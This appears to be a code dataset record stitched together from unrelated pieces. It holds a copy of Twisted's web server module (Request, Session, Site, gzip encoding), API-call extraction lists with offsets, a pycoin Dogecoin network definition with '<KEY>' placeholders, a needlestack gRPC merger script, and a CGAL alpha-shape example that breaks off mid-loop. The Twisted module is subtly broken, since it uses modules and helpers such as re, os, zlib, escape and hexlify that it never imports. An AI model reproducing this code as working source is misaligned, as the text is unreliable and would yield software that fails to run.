from zope.interface import implementer
from twisted.python.compat import networkString, nativeString
from twisted.spread.pb import Copyable, ViewPoint
from twisted.internet import address, interfaces
from twisted.internet.error import AlreadyCalled, AlreadyCancelled
from twisted.web import iweb, http, util
from twisted.web.http import unquote
from twisted.python import reflect, failure, components
from twisted import copyright
from twisted.web import resource
from twisted.web.error import UnsupportedMethod
from incremental import Version
from twisted.python.deprecate import deprecatedModuleAttribute
from twisted.logger import Logger
NOT_DONE_YET = 1
__all__ = [
"supportedMethods",
"Request",
"Session",
"Site",
"version",
"NOT_DONE_YET",
"GzipEncoderFactory",
]
# backwards compatibility
deprecatedModuleAttribute(
Version("Twisted", 12, 1, 0),
"Please use twisted.web.http.datetimeToString instead",
"twisted.web.server",
"date_time_string",
)
deprecatedModuleAttribute(
Version("Twisted", 12, 1, 0),
"Please use twisted.web.http.stringToDatetime instead",
"twisted.web.server",
"string_date_time",
)
date_time_string = http.datetimeToString
string_date_time = http.stringToDatetime
# Support for other methods may be implemented on a per-resource basis.
supportedMethods = (b"GET", b"HEAD", b"POST")
def quote(string, *args, **kwargs):
return _quote(string.decode("charmap"), *args, **kwargs).encode("charmap")
def _addressToTuple(addr):
if isinstance(addr, address.IPv4Address):
return ("INET", addr.host, addr.port)
elif isinstance(addr, address.UNIXAddress):
return ("UNIX", addr.name)
else:
return tuple(addr)
@implementer(iweb.IRequest)
class Request(Copyable, http.Request, components.Componentized):
"""
An HTTP request.
@ivar defaultContentType: A L{bytes} giving the default I{Content-Type}
value to send in responses if no other value is set. L{None} disables
the default.
@ivar _insecureSession: The L{Session} object representing state that will
be transmitted over plain-text HTTP.
@ivar _secureSession: The L{Session} object representing the state that
will be transmitted only over HTTPS.
"""
defaultContentType = b"text/html"
site = None
appRootURL = None
prepath: Optional[List[bytes]] = None
postpath: Optional[List[bytes]] = None
__pychecker__ = "unusednames=issuer"
_inFakeHead = False
_encoder = None
_log = Logger()
def __init__(self, *args, **kw):
http.Request.__init__(self, *args, **kw)
components.Componentized.__init__(self)
def getStateToCopyFor(self, issuer):
x = self.__dict__.copy()
del x["transport"]
# XXX refactor this attribute out; it's from protocol
# del x['server']
del x["channel"]
del x["content"]
del x["site"]
self.content.seek(0, 0)
x["content_data"] = self.content.read()
x["remote"] = ViewPoint(issuer, self)
# Address objects aren't jellyable
x["host"] = _addressToTuple(x["host"])
x["client"] = _addressToTuple(x["client"])
# Header objects also aren't jellyable.
x["requestHeaders"] = list(x["requestHeaders"].getAllRawHeaders())
return x
# HTML generation helpers
def sibLink(self, name):
"""
Return the text that links to a sibling of the requested resource.
@param name: The sibling resource
@type name: C{bytes}
@return: A relative URL.
@rtype: C{bytes}
"""
if self.postpath:
return (len(self.postpath) * b"../") + name
else:
return name
def childLink(self, name):
"""
Return the text that links to a child of the requested resource.
@param name: The child resource
@type name: C{bytes}
@return: A relative URL.
@rtype: C{bytes}
"""
lpp = len(self.postpath)
if lpp > 1:
return ((lpp - 1) * b"../") + name
elif lpp == 1:
return name
else: # lpp == 0
if len(self.prepath) and self.prepath[-1]:
return self.prepath[-1] + b"/" + name
else:
return name
def gotLength(self, length):
"""
Called when HTTP channel got length of content in this request.
This method is not intended for users.
@param length: The length of the request body, as indicated by the
request headers. L{None} if the request headers do not indicate a
length.
"""
try:
getContentFile = self.channel.site.getContentFile
except AttributeError:
http.Request.gotLength(self, length)
else:
self.content = getContentFile(length)
def process(self):
"""
Process a request.
Find the addressed resource in this request's L{Site},
and call L{self.render()<Request.render()>} with it.
@see: L{Site.getResourceFor()}
"""
# get site from channel
self.site = self.channel.site
# set various default headers
self.setHeader(b"server", version)
self.setHeader(b"date", http.datetimeToString())
# Resource Identification
self.prepath = []
self.postpath = list(map(unquote, self.path[1:].split(b"/")))
# Short-circuit for requests whose path is '*'.
if self.path == b"*":
self._handleStar()
return
try:
resrc = self.site.getResourceFor(self)
if resource._IEncodingResource.providedBy(resrc):
encoder = resrc.getEncoder(self)
if encoder is not None:
self._encoder = encoder
self.render(resrc)
except BaseException:
self.processingFailed(failure.Failure())
def write(self, data):
"""
Write data to the transport (if not responding to a HEAD request).
@param data: A string to write to the response.
@type data: L{bytes}
"""
if not self.startedWriting:
# Before doing the first write, check to see if a default
# Content-Type header should be supplied. We omit it on
# NOT_MODIFIED and NO_CONTENT responses. We also omit it if there
# is a Content-Length header set to 0, as empty bodies don't need
# a content-type.
needsCT = self.code not in (http.NOT_MODIFIED, http.NO_CONTENT)
contentType = self.responseHeaders.getRawHeaders(b"content-type")
contentLength = self.responseHeaders.getRawHeaders(b"content-length")
contentLengthZero = contentLength and (contentLength[0] == b"0")
if (
needsCT
and contentType is None
and self.defaultContentType is not None
and not contentLengthZero
):
self.responseHeaders.setRawHeaders(
b"content-type", [self.defaultContentType]
)
# Only let the write happen if we're not generating a HEAD response by
# faking out the request method. Note, if we are doing that,
# startedWriting will never be true, and the above logic may run
# multiple times. It will only actually change the responseHeaders
# once though, so it's still okay.
if not self._inFakeHead:
if self._encoder:
data = self._encoder.encode(data)
http.Request.write(self, data)
def finish(self):
"""
Override C{http.Request.finish} for possible encoding.
"""
if self._encoder:
data = self._encoder.finish()
if data:
http.Request.write(self, data)
return http.Request.finish(self)
def render(self, resrc):
"""
Ask a resource to render itself.
If the resource does not support the requested method,
generate a C{NOT IMPLEMENTED} or C{NOT ALLOWED} response.
@param resrc: The resource to render.
@type resrc: L{twisted.web.resource.IResource}
@see: L{IResource.render()<twisted.web.resource.IResource.render()>}
"""
try:
body = resrc.render(self)
except UnsupportedMethod as e:
allowedMethods = e.allowedMethods
if (self.method == b"HEAD") and (b"GET" in allowedMethods):
# We must support HEAD (RFC 2616, 5.1.1). If the
# resource doesn't, fake it by giving the resource
# a 'GET' request and then return only the headers,
# not the body.
self._log.info(
"Using GET to fake a HEAD request for {resrc}", resrc=resrc
)
self.method = b"GET"
self._inFakeHead = True
body = resrc.render(self)
if body is NOT_DONE_YET:
self._log.info(
"Tried to fake a HEAD request for {resrc}, but "
"it got away from me.",
resrc=resrc,
)
# Oh well, I guess we won't include the content length.
else:
self.setHeader(b"content-length", b"%d" % (len(body),))
self._inFakeHead = False
self.method = b"HEAD"
self.write(b"")
self.finish()
return
if self.method in (supportedMethods):
# We MUST include an Allow header
# (RFC 2616, 10.4.6 and 14.7)
self.setHeader(b"Allow", b", ".join(allowedMethods))
s = (
"""Your browser approached me (at %(URI)s) with"""
""" the method "%(method)s". I only allow"""
""" the method%(plural)s %(allowed)s here."""
% {
"URI": escape(nativeString(self.uri)),
"method": nativeString(self.method),
"plural": ((len(allowedMethods) > 1) and "s") or "",
"allowed": ", ".join([nativeString(x) for x in allowedMethods]),
}
)
epage = resource.ErrorPage(http.NOT_ALLOWED, "Method Not Allowed", s)
body = epage.render(self)
else:
epage = resource.ErrorPage(
http.NOT_IMPLEMENTED,
"Huh?",
"I don't know how to treat a %s request."
% (escape(self.method.decode("charmap")),),
)
body = epage.render(self)
# end except UnsupportedMethod
if body is NOT_DONE_YET:
return
if not isinstance(body, bytes):
body = resource.ErrorPage(
http.INTERNAL_SERVER_ERROR,
"Request did not return bytes",
"Request: "
+ util._PRE(reflect.safe_repr(self))
+ "<br />"
+ "Resource: "
+ util._PRE(reflect.safe_repr(resrc))
+ "<br />"
+ "Value: "
+ util._PRE(reflect.safe_repr(body)),
).render(self)
if self.method == b"HEAD":
if len(body) > 0:
# This is a Bad Thing (RFC 2616, 9.4)
self._log.info(
"Warning: HEAD request {slf} for resource {resrc} is"
" returning a message body. I think I'll eat it.",
slf=self,
resrc=resrc,
)
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(b"")
else:
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(body)
self.finish()
def processingFailed(self, reason):
"""
Finish this request with an indication that processing failed and
possibly display a traceback.
@param reason: Reason this request has failed.
@type reason: L{twisted.python.failure.Failure}
@return: The reason passed to this method.
@rtype: L{twisted.python.failure.Failure}
"""
self._log.failure("", failure=reason)
if self.site.displayTracebacks:
body = (
b"<html><head><title>web.Server Traceback"
b" (most recent call last)</title></head>"
b"<body><b>web.Server Traceback"
b" (most recent call last):</b>\n\n"
+ util.formatFailure(reason)
+ b"\n\n</body></html>\n"
)
else:
body = (
b"<html><head><title>Processing Failed"
b"</title></head><body>"
b"<b>Processing Failed</b></body></html>"
)
self.setResponseCode(http.INTERNAL_SERVER_ERROR)
self.setHeader(b"content-type", b"text/html")
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(body)
self.finish()
return reason
def view_write(self, issuer, data):
"""Remote version of write; same interface."""
self.write(data)
def view_finish(self, issuer):
"""Remote version of finish; same interface."""
self.finish()
def view_addCookie(self, issuer, k, v, **kwargs):
"""Remote version of addCookie; same interface."""
self.addCookie(k, v, **kwargs)
def view_setHeader(self, issuer, k, v):
"""Remote version of setHeader; same interface."""
self.setHeader(k, v)
def view_setLastModified(self, issuer, when):
"""Remote version of setLastModified; same interface."""
self.setLastModified(when)
def view_setETag(self, issuer, tag):
"""Remote version of setETag; same interface."""
self.setETag(tag)
def view_setResponseCode(self, issuer, code, message=None):
"""
Remote version of setResponseCode; same interface.
"""
self.setResponseCode(code, message)
def view_registerProducer(self, issuer, producer, streaming):
"""Remote version of registerProducer; same interface.
(requires a remote producer.)
"""
self.registerProducer(_RemoteProducerWrapper(producer), streaming)
def view_unregisterProducer(self, issuer):
self.unregisterProducer()
### these calls remain local
_secureSession = None
_insecureSession = None
@property
def session(self):
"""
If a session has already been created or looked up with
L{Request.getSession}, this will return that object. (This will always
be the session that matches the security of the request; so if
C{forceNotSecure} is used on a secure request, this will not return
that session.)
@return: the session attribute
@rtype: L{Session} or L{None}
"""
if self.isSecure():
return self._secureSession
else:
return self._insecureSession
def getSession(self, sessionInterface=None, forceNotSecure=False):
"""
Check if there is a session cookie, and if not, create it.
By default, the cookie with be secure for HTTPS requests and not secure
for HTTP requests. If for some reason you need access to the insecure
cookie from a secure request you can set C{forceNotSecure = True}.
@param forceNotSecure: Should we retrieve a session that will be
transmitted over HTTP, even if this L{Request} was delivered over
HTTPS?
@type forceNotSecure: L{bool}
"""
# Make sure we aren't creating a secure session on a non-secure page
secure = self.isSecure() and not forceNotSecure
if not secure:
cookieString = b"TWISTED_SESSION"
sessionAttribute = "_insecureSession"
else:
cookieString = b"TWISTED_SECURE_SESSION"
sessionAttribute = "_secureSession"
session = getattr(self, sessionAttribute)
if session is not None:
# We have a previously created session.
try:
# Refresh the session, to keep it alive.
session.touch()
except (AlreadyCalled, AlreadyCancelled):
# Session has already expired.
session = None
if session is None:
# No session was created yet for this request.
cookiename = b"_".join([cookieString] + self.sitepath)
sessionCookie = self.getCookie(cookiename)
if sessionCookie:
try:
session = self.site.getSession(sessionCookie)
except KeyError:
pass
# if it still hasn't been set, fix it up.
if not session:
session = self.site.makeSession()
self.addCookie(cookiename, session.uid, path=b"/", secure=secure)
setattr(self, sessionAttribute, session)
if sessionInterface:
return session.getComponent(sessionInterface)
return session
def _prePathURL(self, prepath):
port = self.getHost().port
if self.isSecure():
default = 443
else:
default = 80
if port == default:
hostport = ""
else:
hostport = ":%d" % port
prefix = networkString(
"http%s://%s%s/"
% (
self.isSecure() and "s" or "",
nativeString(self.getRequestHostname()),
hostport,
)
)
path = b"/".join([quote(segment, safe=b"") for segment in prepath])
return prefix + path
def prePathURL(self):
return self._prePathURL(self.prepath)
def URLPath(self):
from twisted.python import urlpath
return urlpath.URLPath.fromRequest(self)
def rememberRootURL(self):
"""
Remember the currently-processed part of the URL for later
recalling.
"""
url = self._prePathURL(self.prepath[:-1])
self.appRootURL = url
def getRootURL(self):
"""
Get a previously-remembered URL.
@return: An absolute URL.
@rtype: L{bytes}
"""
return self.appRootURL
def _handleStar(self):
"""
Handle receiving a request whose path is '*'.
RFC 7231 defines an OPTIONS * request as being something that a client
can send as a low-effort way to probe server capabilities or readiness.
Rather than bother the user with this, we simply fast-path it back to
an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed
telling the client they can only use OPTIONS.
"""
if self.method == b"OPTIONS":
self.setResponseCode(http.OK)
else:
self.setResponseCode(http.NOT_ALLOWED)
self.setHeader(b"Allow", b"OPTIONS")
# RFC 7231 says we MUST set content-length 0 when responding to this
# with no body.
self.setHeader(b"Content-Length", b"0")
self.finish()
@implementer(iweb._IRequestEncoderFactory)
class GzipEncoderFactory:
"""
@cvar compressLevel: The compression level used by the compressor, default
to 9 (highest).
@since: 12.3
"""
_gzipCheckRegex = re.compile(br"(:?^|[\s,])gzip(:?$|[\s,])")
compressLevel = 9
def encoderForRequest(self, request):
"""
Check the headers if the client accepts gzip encoding, and encodes the
request if so.
"""
acceptHeaders = b",".join(
request.requestHeaders.getRawHeaders(b"accept-encoding", [])
)
if self._gzipCheckRegex.search(acceptHeaders):
encoding = request.responseHeaders.getRawHeaders(b"content-encoding")
if encoding:
encoding = b",".join(encoding + [b"gzip"])
else:
encoding = b"gzip"
request.responseHeaders.setRawHeaders(b"content-encoding", [encoding])
return _GzipEncoder(self.compressLevel, request)
@implementer(iweb._IRequestEncoder)
class _GzipEncoder:
"""
An encoder which supports gzip.
@ivar _zlibCompressor: The zlib compressor instance used to compress the
stream.
@ivar _request: A reference to the originating request.
@since: 12.3
"""
_zlibCompressor = None
def __init__(self, compressLevel, request):
self._zlibCompressor = zlib.compressobj(
compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS
)
self._request = request
def encode(self, data):
"""
Write to the request, automatically compressing data on the fly.
"""
if not self._request.startedWriting:
# Remove the content-length header, we can't honor it
# because we compress on the fly.
self._request.responseHeaders.removeHeader(b"content-length")
return self._zlibCompressor.compress(data)
def finish(self):
"""
Finish handling the request request, flushing any data from the zlib
buffer.
"""
remain = self._zlibCompressor.flush()
self._zlibCompressor = None
return remain
class _RemoteProducerWrapper:
def __init__(self, remote):
self.resumeProducing = remote.remoteMethod("resumeProducing")
self.pauseProducing = remote.remoteMethod("pauseProducing")
self.stopProducing = remote.remoteMethod("stopProducing")
class Session(components.Componentized):
"""
A user's session with a system.
This utility class contains no functionality, but is used to
represent a session.
@ivar site: The L{Site} that generated the session.
@type site: L{Site}
@ivar uid: A unique identifier for the session.
@type uid: L{bytes}
@ivar _reactor: An object providing L{IReactorTime} to use for scheduling
expiration.
@ivar sessionTimeout: Time after last modification the session will expire,
in seconds.
@type sessionTimeout: L{float}
@ivar lastModified: Time the C{touch()} method was last called (or time the
session was created). A UNIX timestamp as returned by
L{IReactorTime.seconds()}.
@type lastModified: L{float}
"""
sessionTimeout = 900
_expireCall = None
def __init__(self, site, uid, reactor=None):
"""
Initialize a session with a unique ID for that session.
@param reactor: L{IReactorTime} used to schedule expiration of the
session. If C{None}, the reactor associated with I{site} is used.
"""
super().__init__()
if reactor is None:
reactor = site.reactor
self._reactor = reactor
self.site = site
self.uid = uid
self.expireCallbacks = []
self.touch()
self.sessionNamespaces = {}
def startCheckingExpiration(self):
"""
Start expiration tracking.
@return: L{None}
"""
self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire)
def notifyOnExpire(self, callback):
"""
Call this callback when the session expires or logs out.
"""
self.expireCallbacks.append(callback)
def expire(self):
"""
Expire/logout of the session.
"""
del self.site.sessions[self.uid]
for c in self.expireCallbacks:
c()
self.expireCallbacks = []
if self._expireCall and self._expireCall.active():
self._expireCall.cancel()
# Break reference cycle.
self._expireCall = None
def touch(self):
"""
Mark the session as modified, which resets expiration timer.
"""
self.lastModified = self._reactor.seconds()
if self._expireCall is not None:
self._expireCall.reset(self.sessionTimeout)
version = networkString(f"TwistedWeb/{copyright.version}")
@implementer(interfaces.IProtocolNegotiationFactory)
class Site(http.HTTPFactory):
"""
A web site: manage log, sessions, and resources.
@ivar requestFactory: A factory which is called with (channel)
and creates L{Request} instances. Default to L{Request}.
@ivar displayTracebacks: If set, unhandled exceptions raised during
rendering are returned to the client as HTML. Default to C{False}.
@ivar sessionFactory: factory for sessions objects. Default to L{Session}.
@ivar sessions: Mapping of session IDs to objects returned by
C{sessionFactory}.
@type sessions: L{dict} mapping L{bytes} to L{Session} given the default
C{sessionFactory}
@ivar counter: The number of sessions that have been generated.
@type counter: L{int}
@ivar sessionCheckTime: Deprecated and unused. See
L{Session.sessionTimeout} instead.
"""
counter = 0
requestFactory = Request
displayTracebacks = False
sessionFactory = Session
sessionCheckTime = 1800
_entropy = os.urandom
def __init__(self, resource, requestFactory=None, *args, **kwargs):
"""
@param resource: The root of the resource hierarchy. All request
traversal for requests received by this factory will begin at this
resource.
@type resource: L{IResource} provider
@param requestFactory: Overwrite for default requestFactory.
@type requestFactory: C{callable} or C{class}.
@see: L{twisted.web.http.HTTPFactory.__init__}
"""
super().__init__(*args, **kwargs)
self.sessions = {}
self.resource = resource
if requestFactory is not None:
self.requestFactory = requestFactory
def _openLogFile(self, path):
from twisted.python import logfile
return logfile.LogFile(os.path.basename(path), os.path.dirname(path))
def __getstate__(self):
d = self.__dict__.copy()
d["sessions"] = {}
return d
def _mkuid(self):
"""
(internal) Generate an opaque, unique ID for a user's session.
"""
self.counter = self.counter + 1
return hexlify(self._entropy(32))
def makeSession(self):
"""
Generate a new Session instance, and store it for future reference.
"""
uid = self._mkuid()
session = self.sessions[uid] = self.sessionFactory(self, uid)
session.startCheckingExpiration()
return session
def getSession(self, uid):
"""
Get a previously generated session.
@param uid: Unique ID of the session.
@type uid: L{bytes}.
@raise KeyError: If the session is not found.
"""
return self.sessions[uid]
def buildProtocol(self, addr):
"""
Generate a channel attached to this site.
"""
channel = super().buildProtocol(addr)
channel.requestFactory = self.requestFactory
channel.site = self
return channel
isLeaf = 0
def render(self, request):
"""
Redirect because a Site is always a directory.
"""
request.redirect(request.prePathURL() + b"/")
request.finish()
def getChildWithDefault(self, pathEl, request):
"""
Emulate a resource's getChild method.
"""
request.site = self
return self.resource.getChildWithDefault(pathEl, request)
def getResourceFor(self, request):
"""
Get a resource for a request.
This iterates through the resource hierarchy, calling
getChildWithDefault on each resource it finds for a path element,
stopping when it hits an element where isLeaf is true.
"""
request.site = self
# Sitepath is used to determine cookie names between distributed
# servers and disconnected sites.
request.sitepath = copy.copy(request.prepath)
return resource.getChildForRequest(self.resource, request)
# IProtocolNegotiationFactory
def acceptableProtocols(self):
"""
Protocols this server can speak.
"""
baseProtocols = [b"http/1.1"]
if http.H2_ENABLED:
baseProtocols.insert(0, b"h2")
return baseProtocols
| [
"twisted.python.components.Componentized.__init__",
"twisted.python.urlpath.URLPath.fromRequest",
"re.compile",
"twisted.logger.Logger",
"twisted.web.resource.getChildForRequest",
"twisted.web.http.Request.gotLength",
"copy.copy",
"zlib.compressobj",
"twisted.web.resource._IEncodingResource.providedBy",
"twisted.spread.pb.ViewPoint",
"incremental.Version",
"os.path.dirname",
"twisted.python.failure.Failure",
"twisted.python.compat.nativeString",
"twisted.python.reflect.safe_repr",
"twisted.web.http.Request.finish",
"twisted.web.resource.ErrorPage",
"zope.interface.implementer",
"twisted.web.http.datetimeToString",
"twisted.python.compat.networkString",
"twisted.web.http.Request.__init__",
"os.path.basename",
"twisted.web.util.formatFailure",
"twisted.web.http.Request.write"
] | [((2482, 2508), 'zope.interface.implementer', 'implementer', (['iweb.IRequest'], {}), '(iweb.IRequest)\n', (2493, 2508), False, 'from zope.interface import implementer\n'), ((20318, 20359), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoderFactory'], {}), '(iweb._IRequestEncoderFactory)\n', (20329, 20359), False, 'from zope.interface import implementer\n'), ((21320, 21354), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoder'], {}), '(iweb._IRequestEncoder)\n', (21331, 21354), False, 'from zope.interface import implementer\n'), ((25192, 25240), 'twisted.python.compat.networkString', 'networkString', (['f"""TwistedWeb/{copyright.version}"""'], {}), "(f'TwistedWeb/{copyright.version}')\n", (25205, 25240), False, 'from twisted.python.compat import networkString, nativeString\n'), ((25244, 25295), 'zope.interface.implementer', 'implementer', (['interfaces.IProtocolNegotiationFactory'], {}), '(interfaces.IProtocolNegotiationFactory)\n', (25255, 25295), False, 'from zope.interface import implementer\n'), ((1605, 1633), 'incremental.Version', 'Version', (['"""Twisted"""', '(12)', '(1)', '(0)'], {}), "('Twisted', 12, 1, 0)\n", (1612, 1633), False, 'from incremental import Version\n'), ((1778, 1806), 'incremental.Version', 'Version', (['"""Twisted"""', '(12)', '(1)', '(0)'], {}), "('Twisted', 12, 1, 0)\n", (1785, 1806), False, 'from incremental import Version\n'), ((3294, 3302), 'twisted.logger.Logger', 'Logger', ([], {}), '()\n', (3300, 3302), False, 'from twisted.logger import Logger\n'), ((20546, 20589), 're.compile', 're.compile', (["b'(:?^|[\\\\s,])gzip(:?$|[\\\\s,])'"], {}), "(b'(:?^|[\\\\s,])gzip(:?$|[\\\\s,])')\n", (20556, 20589), False, 'import re\n'), ((3349, 3389), 'twisted.web.http.Request.__init__', 'http.Request.__init__', (['self', '*args'], {}), '(self, *args, **kw)\n', (3370, 3389), False, 'from twisted.web import iweb, http, util\n'), ((3398, 3437), 'twisted.python.components.Componentized.__init__', 'components.Componentized.__init__', (['self'], {}), '(self)\n', (3431, 3437), False, 'from twisted.python import reflect, failure, components\n'), ((3802, 3825), 'twisted.spread.pb.ViewPoint', 'ViewPoint', (['issuer', 'self'], {}), '(issuer, self)\n', (3811, 3825), False, 'from twisted.spread.pb import Copyable, ViewPoint\n'), ((8744, 8769), 'twisted.web.http.Request.finish', 'http.Request.finish', (['self'], {}), '(self)\n', (8763, 8769), False, 'from twisted.web import iweb, http, util\n'), ((19036, 19069), 'twisted.python.urlpath.URLPath.fromRequest', 'urlpath.URLPath.fromRequest', (['self'], {}), '(self)\n', (19063, 19069), False, 'from twisted.python import urlpath\n'), ((21708, 21775), 'zlib.compressobj', 'zlib.compressobj', (['compressLevel', 'zlib.DEFLATED', '(16 + zlib.MAX_WBITS)'], {}), '(compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS)\n', (21724, 21775), False, 'import zlib\n'), ((29168, 29194), 'copy.copy', 'copy.copy', (['request.prepath'], {}), '(request.prepath)\n', (29177, 29194), False, 'import copy\n'), ((29210, 29261), 'twisted.web.resource.getChildForRequest', 'resource.getChildForRequest', (['self.resource', 'request'], {}), '(self.resource, request)\n', (29237, 29261), False, 'from twisted.web import resource\n'), ((6104, 6127), 'twisted.web.http.datetimeToString', 'http.datetimeToString', ([], {}), '()\n', (6125, 6127), False, 'from twisted.web import iweb, http, util\n'), ((6477, 6522), 'twisted.web.resource._IEncodingResource.providedBy', 'resource._IEncodingResource.providedBy', (['resrc'], {}), '(resrc)\n', (6515, 6522), False, 'from twisted.web import resource\n'), ((8452, 8482), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\n', (8470, 8482), False, 'from twisted.web import iweb, http, util\n'), ((27104, 27126), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (27120, 27126), False, 'import os\n'), ((27128, 27149), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (27143, 27149), False, 'import os\n'), ((5578, 5614), 'twisted.web.http.Request.gotLength', 'http.Request.gotLength', (['self', 'length'], {}), '(self, length)\n', (5600, 5614), False, 'from twisted.web import iweb, http, util\n'), ((8698, 8728), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\n', (8716, 8728), False, 'from twisted.web import iweb, http, util\n'), ((6752, 6769), 'twisted.python.failure.Failure', 'failure.Failure', ([], {}), '()\n', (6767, 6769), False, 'from twisted.python import reflect, failure, components\n'), ((11281, 11342), 'twisted.web.resource.ErrorPage', 'resource.ErrorPage', (['http.NOT_ALLOWED', '"""Method Not Allowed"""', 's'], {}), "(http.NOT_ALLOWED, 'Method Not Allowed', s)\n", (11299, 11342), False, 'from twisted.web import resource\n'), ((13642, 13668), 'twisted.web.util.formatFailure', 'util.formatFailure', (['reason'], {}), '(reason)\n', (13660, 13668), False, 'from twisted.web import iweb, http, util\n'), ((11024, 11049), 'twisted.python.compat.nativeString', 'nativeString', (['self.method'], {}), '(self.method)\n', (11036, 11049), False, 'from twisted.python.compat import networkString, nativeString\n'), ((10965, 10987), 'twisted.python.compat.nativeString', 'nativeString', (['self.uri'], {}), '(self.uri)\n', (10977, 10987), False, 'from twisted.python.compat import networkString, nativeString\n'), ((12242, 12265), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['body'], {}), '(body)\n', (12259, 12265), False, 'from twisted.python import reflect, failure, components\n'), ((11174, 11189), 'twisted.python.compat.nativeString', 'nativeString', (['x'], {}), '(x)\n', (11186, 11189), False, 'from twisted.python.compat import networkString, nativeString\n'), ((12133, 12157), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['resrc'], {}), '(resrc)\n', (12150, 12157), False, 'from twisted.python import reflect, failure, components\n'), ((12022, 12045), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['self'], {}), '(self)\n', (12039, 12045), False, 'from twisted.python import reflect, failure, components\n')] |
from pycoin.networks.bitcoinish import create_bitcoinish_network
network = create_bitcoinish_network(
symbol="DOGE", network_name="Dogecoin", subnet_name="mainnet",
wif_prefix_hex="9e", address_prefix_hex="1e", pay_to_script_prefix_hex="16",
bip32_prv_prefix_hex="<KEY>", bip32_pub_prefix_hex="<KEY>")
| [
"pycoin.networks.bitcoinish.create_bitcoinish_network"
] | [((76, 313), 'pycoin.networks.bitcoinish.create_bitcoinish_network', 'create_bitcoinish_network', ([], {'symbol': '"""DOGE"""', 'network_name': '"""Dogecoin"""', 'subnet_name': '"""mainnet"""', 'wif_prefix_hex': '"""9e"""', 'address_prefix_hex': '"""1e"""', 'pay_to_script_prefix_hex': '"""16"""', 'bip32_prv_prefix_hex': '"""<KEY>"""', 'bip32_pub_prefix_hex': '"""<KEY>"""'}), "(symbol='DOGE', network_name='Dogecoin',\n subnet_name='mainnet', wif_prefix_hex='9e', address_prefix_hex='1e',\n pay_to_script_prefix_hex='16', bip32_prv_prefix_hex='<KEY>',\n bip32_pub_prefix_hex='<KEY>')\n", (101, 313), False, 'from pycoin.networks.bitcoinish import create_bitcoinish_network\n')] |
import logging
from grpc_health.v1 import health_pb2, health_pb2_grpc
from grpc_health.v1.health import HealthServicer
from needlestack.apis import servicers_pb2_grpc
from needlestack.servicers import factory
from needlestack.servicers.merger import MergerServicer
from examples import configs
logging.getLogger("kazoo").setLevel("WARN")
def main():
config = configs.LocalDockerConfig()
server = factory.create_server(config)
manager = factory.create_zookeeper_cluster_manager(config)
manager.startup()
servicers_pb2_grpc.add_MergerServicer_to_server(MergerServicer(config, manager), server)
health = HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(health, server)
health.set("Merger", health_pb2.HealthCheckResponse.SERVING)
factory.serve(server)
if __name__ == "__main__":
main()
| [
"examples.configs.LocalDockerConfig",
"logging.getLogger",
"needlestack.servicers.factory.create_zookeeper_cluster_manager",
"needlestack.servicers.merger.MergerServicer",
"grpc_health.v1.health.HealthServicer",
"needlestack.servicers.factory.serve",
"needlestack.servicers.factory.create_server",
"grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server"
] | [((369, 396), 'examples.configs.LocalDockerConfig', 'configs.LocalDockerConfig', ([], {}), '()\n', (394, 396), False, 'from examples import configs\n'), ((411, 440), 'needlestack.servicers.factory.create_server', 'factory.create_server', (['config'], {}), '(config)\n', (432, 440), False, 'from needlestack.servicers import factory\n'), ((455, 503), 'needlestack.servicers.factory.create_zookeeper_cluster_manager', 'factory.create_zookeeper_cluster_manager', (['config'], {}), '(config)\n', (495, 503), False, 'from needlestack.servicers import factory\n'), ((634, 650), 'grpc_health.v1.health.HealthServicer', 'HealthServicer', ([], {}), '()\n', (648, 650), False, 'from grpc_health.v1.health import HealthServicer\n'), ((655, 715), 'grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server', 'health_pb2_grpc.add_HealthServicer_to_server', (['health', 'server'], {}), '(health, server)\n', (699, 715), False, 'from grpc_health.v1 import health_pb2, health_pb2_grpc\n'), ((786, 807), 'needlestack.servicers.factory.serve', 'factory.serve', (['server'], {}), '(server)\n', (799, 807), False, 'from needlestack.servicers import factory\n'), ((298, 324), 'logging.getLogger', 'logging.getLogger', (['"""kazoo"""'], {}), "('kazoo')\n", (315, 324), False, 'import logging\n'), ((579, 610), 'needlestack.servicers.merger.MergerServicer', 'MergerServicer', (['config', 'manager'], {}), '(config, manager)\n', (593, 610), False, 'from needlestack.servicers.merger import MergerServicer\n')] |
from CGAL.CGAL_Kernel import Point_2
from CGAL.CGAL_Kernel import Weighted_point_2
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import Face_Interval_3
lst = []
lst.append(Point_2(0, 0))
lst.append(Point_2(0, 4))
lst.append(Point_2(44, 0))
lst.append(Point_2(44, 5))
lst.append(Point_2(444, 51))
lst.append(Point_2(14, 1))
t = Alpha_shape_2(lst, 0, GENERAL)
t2 = Alpha_shape_2(lst, 0)
t.clear()
t.make_alpha_shape(lst)
for d in t.alpha():
print(d)
for v in t.finite_vertices():
type = t.classify(v)
print(v.get_range()[0])
if type == INTERIOR:
print("INTERIOR")
elif type == SINGULAR:
print("SINGULAR")
elif type == REGULAR:
print("REGULAR")
elif type == EXTERIOR:
print("EXTERIOR")
for f in t.finite_faces():
